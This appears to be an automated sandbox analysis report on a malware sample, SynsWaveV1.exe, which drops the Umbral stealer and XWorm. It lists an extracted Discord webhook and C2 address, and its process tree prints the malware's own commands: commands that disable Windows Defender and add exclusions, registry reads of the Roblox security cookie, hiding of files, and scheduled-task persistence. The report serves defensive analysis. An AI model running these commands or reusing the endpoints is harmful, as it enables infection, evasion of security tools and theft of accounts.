Analysis
-
max time kernel
147s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
22-09-2024 10:27
Static task
static1
Behavioral task
behavioral1
Sample
SynsWaveV1.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral2
Sample
SynsWaveV1.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
SynsWaveV1.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
SynsWaveV1.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
SynsWaveV1.exe
Resource
win11-20240802-en
General
-
Target
SynsWaveV1.exe
-
Size
358KB
-
MD5
fe2e1aa24f67aef8cca2a83269e49eb8
-
SHA1
22eff1e84d25f5daf052a046c4c6a66c37f63cc4
-
SHA256
712a0d5ea39f3325f80d76423fa07d8796bf0b75d35d69e8b32714d8836dfd50
-
SHA512
97a7dc677ee2c8ca61729b2ec0532a2d59fb705d413c76f2f5b197053d15cd462a560038e49a75c4b76b3c9255a48690a97dfd7d89d81692c37a7547c6bad837
-
SSDEEP
6144:o5aLkSNxlSl2ZvRbTs6iG0GkBnTYQSeMMHg/dRS4Y83PUf0KrZUNsC:AfG+2ZRQ7GdynTYQSMAV44YGPNKraS
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1287356979475386418/SjsKMoKntf-tJwWJfIOoeVJTxW-pZZsUeBXbJHYWlQ4Unqm9uEyyu-DxEGFodPCSL8F6
Extracted
xworm
expected-schema.gl.at.ply.gg:2980
-
Install_directory
%Userprofile%
-
install_file
USB.exe
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral3/files/0x00090000000120f9-5.dat family_umbral behavioral3/memory/2816-13-0x0000000001010000-0x0000000001050000-memory.dmp family_umbral -
Detect Xworm Payload 4 IoCs
resource yara_rule behavioral3/files/0x0008000000016890-12.dat family_xworm behavioral3/memory/2700-18-0x00000000010B0000-0x00000000010CE000-memory.dmp family_xworm behavioral3/memory/236-93-0x0000000000930000-0x000000000094E000-memory.dmp family_xworm behavioral3/memory/532-96-0x00000000011E0000-0x00000000011FE000-memory.dmp family_xworm -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2312 powershell.exe 964 powershell.exe 1940 powershell.exe 1540 powershell.exe 1764 powershell.exe 300 powershell.exe 2224 powershell.exe 1468 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts MISHA_litvin.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RuntimeBroker.lnk RuntimeBroker.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RuntimeBroker.lnk RuntimeBroker.exe -
Executes dropped EXE 5 IoCs
pid Process 2816 MISHA_litvin.exe 2700 RuntimeBroker.exe 2776 SynsWave.exe 236 RuntimeBroker 532 RuntimeBroker -
Loads dropped DLL 1 IoCs
pid Process 2640 SynsWaveV1.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "C:\\Users\\Admin\\RuntimeBroker" RuntimeBroker.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 9 discord.com 10 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com 4 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3052 cmd.exe 2996 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1188 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2996 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1532 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 2816 MISHA_litvin.exe 1764 powershell.exe 300 powershell.exe 2224 powershell.exe 2828 powershell.exe 2312 powershell.exe 964 powershell.exe 1468 powershell.exe 1940 powershell.exe 1540 powershell.exe 2700 RuntimeBroker.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2700 RuntimeBroker.exe Token: SeDebugPrivilege 2816 MISHA_litvin.exe Token: SeIncreaseQuotaPrivilege 3012 wmic.exe Token: SeSecurityPrivilege 3012 wmic.exe Token: SeTakeOwnershipPrivilege 3012 wmic.exe Token: SeLoadDriverPrivilege 3012 wmic.exe Token: SeSystemProfilePrivilege 3012 wmic.exe Token: SeSystemtimePrivilege 3012 wmic.exe Token: SeProfSingleProcessPrivilege 3012 wmic.exe Token: SeIncBasePriorityPrivilege 3012 wmic.exe Token: SeCreatePagefilePrivilege 3012 wmic.exe Token: SeBackupPrivilege 3012 wmic.exe Token: SeRestorePrivilege 3012 wmic.exe Token: SeShutdownPrivilege 3012 wmic.exe Token: SeDebugPrivilege 3012 wmic.exe Token: SeSystemEnvironmentPrivilege 3012 wmic.exe Token: SeRemoteShutdownPrivilege 3012 wmic.exe Token: SeUndockPrivilege 3012 wmic.exe Token: SeManageVolumePrivilege 3012 wmic.exe Token: 33 3012 wmic.exe Token: 34 3012 wmic.exe Token: 35 3012 wmic.exe Token: SeIncreaseQuotaPrivilege 3012 wmic.exe Token: SeSecurityPrivilege 3012 wmic.exe Token: SeTakeOwnershipPrivilege 3012 wmic.exe Token: SeLoadDriverPrivilege 3012 wmic.exe Token: SeSystemProfilePrivilege 3012 wmic.exe Token: SeSystemtimePrivilege 3012 wmic.exe Token: SeProfSingleProcessPrivilege 3012 wmic.exe Token: SeIncBasePriorityPrivilege 3012 wmic.exe Token: SeCreatePagefilePrivilege 3012 wmic.exe Token: SeBackupPrivilege 3012 wmic.exe Token: SeRestorePrivilege 3012 wmic.exe Token: SeShutdownPrivilege 3012 wmic.exe Token: SeDebugPrivilege 3012 wmic.exe Token: SeSystemEnvironmentPrivilege 3012 wmic.exe Token: SeRemoteShutdownPrivilege 3012 wmic.exe Token: SeUndockPrivilege 3012 wmic.exe Token: SeManageVolumePrivilege 3012 wmic.exe Token: 33 3012 wmic.exe Token: 34 3012 wmic.exe Token: 35 3012 wmic.exe Token: SeDebugPrivilege 1764 powershell.exe Token: SeDebugPrivilege 300 powershell.exe Token: SeDebugPrivilege 2224 powershell.exe Token: SeDebugPrivilege 2828 powershell.exe Token: SeDebugPrivilege 2312 powershell.exe Token: SeIncreaseQuotaPrivilege 2936 wmic.exe Token: SeSecurityPrivilege 2936 wmic.exe Token: SeTakeOwnershipPrivilege 2936 wmic.exe Token: SeLoadDriverPrivilege 2936 wmic.exe Token: SeSystemProfilePrivilege 2936 wmic.exe Token: SeSystemtimePrivilege 2936 wmic.exe Token: SeProfSingleProcessPrivilege 2936 wmic.exe Token: SeIncBasePriorityPrivilege 2936 wmic.exe Token: SeCreatePagefilePrivilege 2936 wmic.exe Token: SeBackupPrivilege 2936 wmic.exe Token: SeRestorePrivilege 2936 wmic.exe Token: SeShutdownPrivilege 2936 wmic.exe Token: SeDebugPrivilege 2936 wmic.exe Token: SeSystemEnvironmentPrivilege 2936 wmic.exe Token: SeRemoteShutdownPrivilege 2936 wmic.exe Token: SeUndockPrivilege 2936 wmic.exe Token: SeManageVolumePrivilege 2936 wmic.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2700 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2640 wrote to memory of 2816 2640 SynsWaveV1.exe 30 PID 2640 wrote to memory of 2816 2640 SynsWaveV1.exe 30 PID 2640 wrote to memory of 2816 2640 SynsWaveV1.exe 30 PID 2640 wrote to memory of 2700 2640 SynsWaveV1.exe 31 PID 2640 wrote to memory of 2700 2640 SynsWaveV1.exe 31 PID 2640 wrote to memory of 2700 2640 SynsWaveV1.exe 31 PID 2640 wrote to memory of 2776 2640 SynsWaveV1.exe 32 PID 2640 wrote to memory of 2776 2640 SynsWaveV1.exe 32 PID 2640 wrote to memory of 2776 2640 SynsWaveV1.exe 32 PID 2776 wrote to memory of 2684 2776 SynsWave.exe 34 PID 2776 wrote to memory of 2684 2776 SynsWave.exe 34 PID 2776 wrote to memory of 2684 2776 SynsWave.exe 34 PID 2816 wrote to memory of 3012 2816 MISHA_litvin.exe 35 PID 2816 wrote to memory of 3012 2816 MISHA_litvin.exe 35 PID 2816 wrote to memory of 3012 2816 MISHA_litvin.exe 35 PID 2816 wrote to memory of 2848 2816 MISHA_litvin.exe 38 PID 2816 wrote to memory of 2848 2816 MISHA_litvin.exe 38 PID 2816 wrote to memory of 2848 2816 MISHA_litvin.exe 38 PID 2816 wrote to memory of 1764 2816 MISHA_litvin.exe 40 PID 2816 wrote to memory of 1764 2816 MISHA_litvin.exe 40 PID 2816 wrote to memory of 1764 2816 MISHA_litvin.exe 40 PID 2816 wrote to memory of 300 2816 MISHA_litvin.exe 42 PID 2816 wrote to memory of 300 2816 MISHA_litvin.exe 42 PID 2816 wrote to memory of 300 2816 MISHA_litvin.exe 42 PID 2816 wrote to memory of 2224 2816 MISHA_litvin.exe 44 PID 2816 wrote to memory of 2224 2816 MISHA_litvin.exe 44 PID 2816 wrote to memory of 2224 2816 MISHA_litvin.exe 44 PID 2816 wrote to memory of 2828 2816 MISHA_litvin.exe 46 PID 2816 wrote to memory of 2828 2816 MISHA_litvin.exe 46 PID 2816 wrote to memory of 2828 2816 MISHA_litvin.exe 46 PID 2700 wrote to memory of 2312 2700 RuntimeBroker.exe 48 PID 2700 wrote to memory of 2312 2700 RuntimeBroker.exe 48 PID 2700 wrote to memory of 2312 2700 RuntimeBroker.exe 48 PID 2816 wrote to memory of 2936 2816 MISHA_litvin.exe 50 PID 2816 wrote to memory of 2936 2816 MISHA_litvin.exe 50 PID 2816 wrote to memory of 2936 2816 MISHA_litvin.exe 50 PID 2816 wrote to memory of 1992 2816 MISHA_litvin.exe 52 PID 2816 wrote to memory of 1992 2816 MISHA_litvin.exe 52 PID 2816 wrote to memory of 1992 2816 MISHA_litvin.exe 52 PID 2700 wrote to memory of 964 2700 RuntimeBroker.exe 54 PID 2700 wrote to memory of 964 2700 RuntimeBroker.exe 54 PID 2700 wrote to memory of 964 2700 RuntimeBroker.exe 54 PID 2816 wrote to memory of 1168 2816 MISHA_litvin.exe 56 PID 2816 wrote to memory of 1168 2816 MISHA_litvin.exe 56 PID 2816 wrote to memory of 1168 2816 MISHA_litvin.exe 56 PID 2816 wrote to memory of 1468 2816 MISHA_litvin.exe 58 PID 2816 wrote to memory of 1468 2816 MISHA_litvin.exe 58 PID 2816 wrote to memory of 1468 2816 MISHA_litvin.exe 58 PID 2700 wrote to memory of 1940 2700 RuntimeBroker.exe 60 PID 2700 wrote to memory of 1940 2700 RuntimeBroker.exe 60 PID 2700 wrote to memory of 1940 2700 RuntimeBroker.exe 60 PID 2816 wrote to memory of 1188 2816 MISHA_litvin.exe 62 PID 2816 wrote to memory of 1188 2816 MISHA_litvin.exe 62 PID 2816 wrote to memory of 1188 2816 MISHA_litvin.exe 62 PID 2700 wrote to memory of 1540 2700 RuntimeBroker.exe 64 PID 2700 wrote to memory of 1540 2700 RuntimeBroker.exe 64 PID 2700 wrote to memory of 1540 2700 RuntimeBroker.exe 64 PID 2816 wrote to memory of 3052 2816 MISHA_litvin.exe 66 PID 2816 wrote to memory of 3052 2816 MISHA_litvin.exe 66 PID 2816 wrote to memory of 3052 2816 MISHA_litvin.exe 66 PID 3052 wrote to memory of 2996 3052 cmd.exe 68 PID 3052 wrote to memory of 2996 3052 cmd.exe 68 PID 3052 wrote to memory of 2996 3052 cmd.exe 68 PID 2700 wrote to memory of 1532 2700 RuntimeBroker.exe 69 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2848 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\SynsWaveV1.exe"C:\Users\Admin\AppData\Local\Temp\SynsWaveV1.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Users\Admin\AppData\Roaming\MISHA_litvin.exe"C:\Users\Admin\AppData\Roaming\MISHA_litvin.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3012
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\MISHA_litvin.exe"3⤵
- Views/modifies file attributes
PID:2848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\MISHA_litvin.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:300
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2224
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2828
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2936
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:1992
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:1168
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1468
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:1188
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\MISHA_litvin.exe" && pause3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Windows\system32\PING.EXEping localhost4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2996
-
-
-
-
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2312
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RuntimeBroker.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\RuntimeBroker'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RuntimeBroker'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1540
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "RuntimeBroker" /tr "C:\Users\Admin\RuntimeBroker"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1532
-
-
-
C:\Users\Admin\AppData\Roaming\SynsWave.exe"C:\Users\Admin\AppData\Roaming\SynsWave.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵PID:2684
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {5C4B5814-FF49-4871-93EA-16ED276F6F5F} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:Interactive:[1]1⤵PID:2068
-
C:\Users\Admin\RuntimeBrokerC:\Users\Admin\RuntimeBroker2⤵
- Executes dropped EXE
PID:236
-
-
C:\Users\Admin\RuntimeBrokerC:\Users\Admin\RuntimeBroker2⤵
- Executes dropped EXE
PID:532
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
229KB
MD58bb8292d00e8218192562b888b4d7671
SHA161a03523336bd54964fbb62338027673d0a138cb
SHA256a9f8c9cf4ceadfa6bc56ab230c8dfe8a7018e1123ba01039a4059b1814b757a0
SHA512c19a19dd6b49cc237e751db9d58db56e745f7d00c8d81397928fddef8902b9abec4b9331573be9478d33554c6b77b4f52a055bf2251300736035b5eec24faa1e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5f7941d3c2bbd02eb6f9ebe88a88e59f1
SHA13081454a325c3ea3ae9304557a962bcc307679f5
SHA25679070e46659597a751078c267c80955ec014d3740d0acaa4aac1788210f36701
SHA512f14cea418bdaa84e258088dc7701a46fe55573a121992545255ade3617f038d0de7e3336ccd974804bd5db8813c873f6ad4201de90561a052bfcac696b2e9ec7
-
Filesize
94KB
MD55e6bae23e86272120e9ccfa3413ece3e
SHA17cf89daa0119650ec13ef056c143249c4002a4f1
SHA256116b46762acbc220ec42b00329392668bf3e24cc00a650f68013465c319cbf4d
SHA5127a607b3e850f930794bc493aa68d0ecf236a23e98ee912e279b1649bd0e2110e01cefcc5259744c06e1b4a8cccaececdde6c2f18ef8d252414cb461bdd9d3f0d
-
Filesize
25KB
MD512e7359129744823438f3d6b97192955
SHA189872a5a18abefe25d10efa824281718cf85ae39
SHA256348086f9bd5939a48efcc94702271c1caf92ea11f3b0385367daf9530b51cf3e
SHA512b38516752817d3ac6541d300cc17176c5bf1c38d321fd19c006cb1f5cf9d5ab7a228184ed267636841225e718f71d9cd8aed5e53e36c7ee3548ed6958b9e8563